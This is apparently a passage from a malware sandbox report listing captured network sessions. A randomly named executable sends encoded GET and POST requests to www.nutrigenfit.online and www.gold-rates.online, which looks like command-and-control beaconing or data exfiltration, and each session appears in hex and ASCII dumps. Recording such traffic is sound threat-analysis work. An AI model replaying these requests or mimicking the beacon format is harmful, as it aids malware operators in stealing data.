                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 6c 46 6a 75 50 7a 7a 66 6a 7a 77 56 47 78 57 30 56 77 54 5a 76 68 30 39 73 58 67 4f 4e 76 57 6d 59 55 2b 59 7a 72 42 76 78 51 46 52 54 58 5a 76 73 63 51 61 39 48 42 44 76 46 6a 2b 53 6a 56 35 73 69 7a 41 46 44 4e 69 61 55 42 44 43 37 69 65 51 2f 70 34 2b 55 34 73 79 52 57 62 59 73 38 75 6a 44 59 66 79 34 67 6c 73 4e 35 58 34 70 77 38 67 6d 64 34 51 73 33 7a 52 77 63 2f 59 69 34 65 42 42 2b 4f 77 6c 30 49 34 37 39 50 51 36 39 73 4f 51 33 67 76 6d 56 53 67 7a 55 31 59 6f 31 69 7a 70 30 63 70 49 38 65 6d 6a 37 68 78 4d 77 4b 44 76 39 42 59 53 74 67 68 4f 6d 2f 37 75 66 2f 76 34 4a 38 37 73 65 4d 54 39 62 35 71 73 73 52 36 54 31 6c 43 5a 4a 2f 69 6b 75 5a 71 47 6f 31 4a 56 4a 6b 4d 54 59 4d 73 75 56 74 47 6d 72 4f 59 2b 73 6c 58 72 62 57 4e 78 38 74 36 6b 73 39 37 46 6e 68 68 67 63 46 59 69 4b 2f 72 38 2f 72 6b 6c 71 50 4b 6d 77 4e 51 74 78 6c 53 39 73 4f 43 6f 4c 68 42 71 55 79 6c 45 34 63 65 31 5a 2f 4a 6a 6b 4d 71 6c 65 58 62 78 72 67 31 66 51 66 75 67 65 39 4e 38 65 6f 62 43 31 [TRUNCATED]
                                                                                                                                            Data Ascii: -v4puN=lFjuPzzfjzwVGxW0VwTZvh09sXgONvWmYU+YzrBvxQFRTXZvscQa9HBDvFj+SjV5sizAFDNiaUBDC7ieQ/p4+U4syRWbYs8ujDYfy4glsN5X4pw8gmd4Qs3zRwc/Yi4eBB+Owl0I479PQ69sOQ3gvmVSgzU1Yo1izp0cpI8emj7hxMwKDv9BYStghOm/7uf/v4J87seMT9b5qssR6T1lCZJ/ikuZqGo1JVJkMTYMsuVtGmrOY+slXrbWNx8t6ks97FnhhgcFYiK/r8/rklqPKmwNQtxlS9sOCoLhBqUylE4ce1Z/JjkMqleXbxrg1fQfuge9N8eobC1y1dJWMVitqyJGkyVJy5ELC+hr6jOqCjovypd1wnB9sY6MHO1UOsEkwPW/k46RdHbhg7wuknX9Cd3XB/831R8IgjNVyhQwtU5G3ppf0rXk+W8zm9Msm5Q9WC3fUxghEu1Kxzu5Bfbu9gYMRwN2uhhZQH3TyPKSRpyx2QBz5NRYKwnOHxI+5fbEw1kMs+suXUeuuV0suzj+qQoyfa0M6N5wTqyaS7L0nUKfmredhhznyl2y7/tSd8nnCP+vQrUjulwUbWvG+Q7hiewslGX7nkyySxXpzV6+qDPGR1qSQvpkPLXZuTdqO419uDbBAa+RoWZSm/BWd4SQqLfWQ+ZDwN8X0Q1P1ClZm6GiYZn5ONb2SwbU3FDeE8QKrW5NzN0Jv2WEdfC5Sjg92v9EbCfjdJ//1csR6vr58SS52ge+p0pykEyfoBt9J45s336bc3noOVkkFXi+ME3JwKzEEXTVEXZC4FhKtYMw0rXzUASAk/xY/mHw07GkwboPYg7r91zCM7s00kssUA7j+dImnsCJJr1hm56ByeCnMl/PzA5IjdgXnJvs0LUUTic4j6F5IHYggOYT02TnybbgoRI27fCaRRILoUeQo2wWdDV+nqUStyQ+rynUIjsQfkKZUHUeAQtR7aBiAikLxnJxq5BQhpkFB2j2l/9uiVdj/1z1o [TRUNCATED]
                                                                                                                                            Oct 22, 2024 13:28:28.654702902 CEST367INHTTP/1.1 404 Not Found
                                                                                                                                            Date: Tue, 22 Oct 2024 11:28:28 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            Content-Length: 203
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 38 67 79 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8gyb/ was not found on this server.</p></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            12192.168.2.549989195.110.124.13380764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:30.352997065 CEST436OUTGET /8gyb/?-v4puN=oHLOMFnpuCQwEmmcfjaPzEs/vXwrZtaPQF7csdtv5Eh2A0RcvZoTiB5djAiNITJM5AjEN183LiB5K62qTN14+moW7AK7WqEInxUu+7Nqydpi+78xinwtbpXqTzluMhpRfQ==&vd=fhUlwfGxBn-tt HTTP/1.1
                                                                                                                                            Host: www.nutrigenfit.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Oct 22, 2024 13:28:31.201189995 CEST367INHTTP/1.1 404 Not Found
                                                                                                                                            Date: Tue, 22 Oct 2024 11:28:31 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            Content-Length: 203
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 38 67 79 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8gyb/ was not found on this server.</p></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            13192.168.2.549990199.59.243.22780764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:36.430651903 CEST700OUTPOST /rod1/ HTTP/1.1
                                                                                                                                            Host: www.gold-rates.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 207
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.gold-rates.online
                                                                                                                                            Referer: http://www.gold-rates.online/rod1/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 33 30 52 4d 6a 45 4e 65 6b 4d 4c 31 57 72 4d 7a 6a 4e 4c 47 2b 7a 41 30 76 79 74 4f 6d 59 74 65 56 67 33 61 72 47 4d 47 58 43 79 48 45 4f 30 4f 6a 50 46 36 52 2f 35 6d 72 64 46 37 51 4d 6c 4d 44 6b 57 30 35 52 30 49 4b 52 4c 44 6b 41 33 51 51 76 33 6f 41 61 74 79 66 66 57 43 43 52 6e 67 63 70 54 71 47 78 4a 51 62 53 42 4b 32 57 55 63 56 55 33 4a 58 53 4e 57 77 4a 45 41 38 62 61 58 5a 51 6c 6a 45 5a 46 64 76 4d 2f 65 31 79 43 74 6c 51 42 57 44 64 4a 66 4c 2f 64 49 48 52 7a 74 36 38 6d 78 48 45 75 64 54 39 79 59 48 55 43 62 44 69 47 74 6c 33 39 59 70 2f 59 71 51 37 45 31 38 36 47 71 4a 79 41 3d
                                                                                                                                            Data Ascii: -v4puN=30RMjENekML1WrMzjNLG+zA0vytOmYteVg3arGMGXCyHEO0OjPF6R/5mrdF7QMlMDkW05R0IKRLDkA3QQv3oAatyffWCCRngcpTqGxJQbSBK2WUcVU3JXSNWwJEA8baXZQljEZFdvM/e1yCtlQBWDdJfL/dIHRzt68mxHEudT9yYHUCbDiGtl39Yp/YqQ7E186GqJyA=
                                                                                                                                            Oct 22, 2024 13:28:37.055794001 CEST1236INHTTP/1.1 200 OK
                                                                                                                                            date: Tue, 22 Oct 2024 11:28:36 GMT
                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                            content-length: 1138
                                                                                                                                            x-request-id: 208f00f2-e07c-4f36-82a2-841f0f17a7a8
                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kfxQN9HaLXRTrNBaelyr30O4whnvOtqRVvdEHA90GUxBMJJFvP4hjF4vH6AGZQ5QR/0UOeXUB/j/H/MYeS1Grw==
                                                                                                                                            set-cookie: parking_session=208f00f2-e07c-4f36-82a2-841f0f17a7a8; expires=Tue, 22 Oct 2024 11:43:36 GMT; path=/
                                                                                                                                            connection: close
                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 66 78 51 4e 39 48 61 4c 58 52 54 72 4e 42 61 65 6c 79 72 33 30 4f 34 77 68 6e 76 4f 74 71 52 56 76 64 45 48 41 39 30 47 55 78 42 4d 4a 4a 46 76 50 34 68 6a 46 34 76 48 36 41 47 5a 51 35 51 52 2f 30 55 4f 65 58 55 42 2f 6a 2f 48 2f 4d 59 65 53 31 47 72 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kfxQN9HaLXRTrNBaelyr30O4whnvOtqRVvdEHA90GUxBMJJFvP4hjF4vH6AGZQ5QR/0UOeXUB/j/H/MYeS1Grw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                            Oct 22, 2024 13:28:37.055828094 CEST591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjA4ZjAwZjItZTA3Yy00ZjM2LTgyYTItODQxZjBmMTdhN2E4IiwicGFnZV90aW1lIjoxNzI5NTk2NT


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            14192.168.2.549991199.59.243.22780764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:39.118401051 CEST720OUTPOST /rod1/ HTTP/1.1
                                                                                                                                            Host: www.gold-rates.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 227
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.gold-rates.online
                                                                                                                                            Referer: http://www.gold-rates.online/rod1/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 33 30 52 4d 6a 45 4e 65 6b 4d 4c 31 55 49 45 7a 6c 73 4c 47 76 6a 41 72 7a 69 74 4f 7a 49 74 67 56 67 4c 61 72 43 56 5a 51 77 47 48 45 72 49 4f 69 4b 78 36 57 2f 35 6d 67 39 46 2b 65 73 6c 48 44 6b 4c 4c 35 56 30 49 4b 52 66 44 6b 46 4c 51 51 59 44 72 41 4b 73 55 53 2f 57 63 50 78 6e 67 63 70 54 71 47 79 31 36 62 53 4a 4b 32 6a 45 63 56 77 6a 4b 4c 69 4e 58 6e 35 45 41 74 4c 62 65 5a 51 6c 52 45 62 77 47 76 4f 48 65 31 7a 79 74 6b 42 42 52 51 39 4a 56 42 66 63 50 41 69 32 56 2f 65 58 38 4d 79 62 49 4c 50 71 73 43 69 7a 78 5a 41 4f 46 32 58 52 67 35 73 51 64 42 4c 6c 63 6d 5a 57 61 58 6c 56 63 37 38 77 51 36 31 48 50 42 6d 52 76 59 7a 41 56 57 78 63 30
                                                                                                                                            Data Ascii: -v4puN=30RMjENekML1UIEzlsLGvjArzitOzItgVgLarCVZQwGHErIOiKx6W/5mg9F+eslHDkLL5V0IKRfDkFLQQYDrAKsUS/WcPxngcpTqGy16bSJK2jEcVwjKLiNXn5EAtLbeZQlREbwGvOHe1zytkBBRQ9JVBfcPAi2V/eX8MybILPqsCizxZAOF2XRg5sQdBLlcmZWaXlVc78wQ61HPBmRvYzAVWxc0
                                                                                                                                            Oct 22, 2024 13:28:39.732848883 CEST1236INHTTP/1.1 200 OK
                                                                                                                                            date: Tue, 22 Oct 2024 11:28:39 GMT
                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                            content-length: 1138
                                                                                                                                            x-request-id: 6a5b2875-f055-4126-9a8c-39dd872d7c50
                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kfxQN9HaLXRTrNBaelyr30O4whnvOtqRVvdEHA90GUxBMJJFvP4hjF4vH6AGZQ5QR/0UOeXUB/j/H/MYeS1Grw==
                                                                                                                                            set-cookie: parking_session=6a5b2875-f055-4126-9a8c-39dd872d7c50; expires=Tue, 22 Oct 2024 11:43:39 GMT; path=/
                                                                                                                                            connection: close
                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 66 78 51 4e 39 48 61 4c 58 52 54 72 4e 42 61 65 6c 79 72 33 30 4f 34 77 68 6e 76 4f 74 71 52 56 76 64 45 48 41 39 30 47 55 78 42 4d 4a 4a 46 76 50 34 68 6a 46 34 76 48 36 41 47 5a 51 35 51 52 2f 30 55 4f 65 58 55 42 2f 6a 2f 48 2f 4d 59 65 53 31 47 72 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kfxQN9HaLXRTrNBaelyr30O4whnvOtqRVvdEHA90GUxBMJJFvP4hjF4vH6AGZQ5QR/0UOeXUB/j/H/MYeS1Grw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                            Oct 22, 2024 13:28:39.732882023 CEST591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmE1YjI4NzUtZjA1NS00MTI2LTlhOGMtMzlkZDg3MmQ3YzUwIiwicGFnZV90aW1lIjoxNzI5NTk2NT


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            15192.168.2.549992199.59.243.22780764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:41.704377890 CEST1737OUTPOST /rod1/ HTTP/1.1
                                                                                                                                            Host: www.gold-rates.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 1243
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.gold-rates.online
                                                                                                                                            Referer: http://www.gold-rates.online/rod1/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 33 30 52 4d 6a 45 4e 65 6b 4d 4c 31 55 49 45 7a 6c 73 4c 47 76 6a 41 72 7a 69 74 4f 7a 49 74 67 56 67 4c 61 72 43 56 5a 51 77 65 48 45 5a 77 4f 6a 74 64 36 58 2f 35 6d 38 4e 46 2f 65 73 6c 61 44 6b 44 50 35 56 77 69 4b 54 6e 44 72 48 54 51 53 73 66 72 4c 4b 73 55 4e 76 57 64 43 52 6e 51 63 70 44 75 47 78 64 36 62 53 4a 4b 32 6b 38 63 54 6b 33 4b 59 79 4e 57 77 4a 45 32 38 62 61 33 5a 51 74 42 45 62 6c 7a 73 2f 6e 65 32 54 69 74 70 58 56 52 54 64 4a 62 47 66 63 74 41 6c 2b 4b 2f 61 2b 50 4d 32 61 41 4c 4e 36 73 42 6b 36 70 44 45 53 69 67 48 46 47 2f 61 35 35 66 65 46 69 75 6f 61 69 4c 43 45 37 2f 4f 73 44 7a 77 2f 65 4e 43 73 63 42 33 63 79 59 58 74 2b 5a 55 30 6d 65 38 50 4f 2b 6c 4a 42 49 79 6d 69 6a 47 4e 50 50 49 69 34 34 72 74 36 74 43 46 77 52 6c 36 49 6c 2b 73 57 37 50 51 4c 52 63 74 56 45 7a 46 79 75 6e 74 39 2b 65 48 74 5a 64 55 67 2b 6d 37 45 7a 36 49 53 74 55 71 49 7a 4d 2f 66 41 6d 63 46 4c 61 70 63 2b 42 79 32 33 69 62 4a 77 7a 45 4b 34 72 74 4d 4b 71 64 32 6f 68 32 [TRUNCATED]
                                                                                                                                            Data Ascii: -v4puN=30RMjENekML1UIEzlsLGvjArzitOzItgVgLarCVZQweHEZwOjtd6X/5m8NF/eslaDkDP5VwiKTnDrHTQSsfrLKsUNvWdCRnQcpDuGxd6bSJK2k8cTk3KYyNWwJE28ba3ZQtBEblzs/ne2TitpXVRTdJbGfctAl+K/a+PM2aALN6sBk6pDESigHFG/a55feFiuoaiLCE7/OsDzw/eNCscB3cyYXt+ZU0me8PO+lJBIymijGNPPIi44rt6tCFwRl6Il+sW7PQLRctVEzFyunt9+eHtZdUg+m7Ez6IStUqIzM/fAmcFLapc+By23ibJwzEK4rtMKqd2oh2ebEh/SsSyJDomHKM4XZX8OhIe7aDjgO4TdTQA5JKL2nDYU/C3kjFXa9jcBPQiulYXe0FBESocgjn83eltsV9JloDC43C2NCP4UF6jeWQwdaoZRF5cRNnOVfeZXbbw1ZnPWqXFvOBIQ1/AHGzGQ4Aha7ja23xuBpSXtYcke3ckSo9pHNmRpnxiW+x31DdhUHOMY3xLtBFGXkPuTTL1oOgeSHTblFB5jr/0VNYJKrKAWkfi9B8wvO5MCoNNno/tmVaijjrbhSD9ODOJ7dK8cVhj/4uNmCP7uMzAb/iuYvxamdAXqyCpUyrmyPiMPA+csXHYux0TOYZQCWiF6mSye4Q0ZGQMVbzKSncUO5FVfIMUsUYZNS/2857o7NvndZ2/VfEzn77kiIIEJXynY0/c91BUEKLPz5KECDP8HNilKkbUTieYvAmDDovjXN0rw2TZTq7WcD2VrNVQuk60vx4aPl0lhoMkOGL9v1oIKgwd2fKgAOtjg+WNgC9n5z72ZSdGsAiY3/2Uen8prTKB34XaefDYrssMwmHWPOj75AwlEAc57W4yTiX7s7y8YVRKgnba4o/P4yq0QY5NNFplQVeOcnF/SaKVHl0bRdXBVJaTCnUaqOuCHT5WLroDx2llahfb0r7JDwRhim5QGG4yCjMdweRiZK9yvuYrDJEaT [TRUNCATED]
                                                                                                                                            Oct 22, 2024 13:28:42.316020966 CEST1236INHTTP/1.1 200 OK
                                                                                                                                            date: Tue, 22 Oct 2024 11:28:41 GMT
                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                            content-length: 1138
                                                                                                                                            x-request-id: 3c9d679b-78f0-4444-9172-116e8ca8fc2b
                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kfxQN9HaLXRTrNBaelyr30O4whnvOtqRVvdEHA90GUxBMJJFvP4hjF4vH6AGZQ5QR/0UOeXUB/j/H/MYeS1Grw==
                                                                                                                                            set-cookie: parking_session=3c9d679b-78f0-4444-9172-116e8ca8fc2b; expires=Tue, 22 Oct 2024 11:43:42 GMT; path=/
                                                                                                                                            connection: close
                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 66 78 51 4e 39 48 61 4c 58 52 54 72 4e 42 61 65 6c 79 72 33 30 4f 34 77 68 6e 76 4f 74 71 52 56 76 64 45 48 41 39 30 47 55 78 42 4d 4a 4a 46 76 50 34 68 6a 46 34 76 48 36 41 47 5a 51 35 51 52 2f 30 55 4f 65 58 55 42 2f 6a 2f 48 2f 4d 59 65 53 31 47 72 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kfxQN9HaLXRTrNBaelyr30O4whnvOtqRVvdEHA90GUxBMJJFvP4hjF4vH6AGZQ5QR/0UOeXUB/j/H/MYeS1Grw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
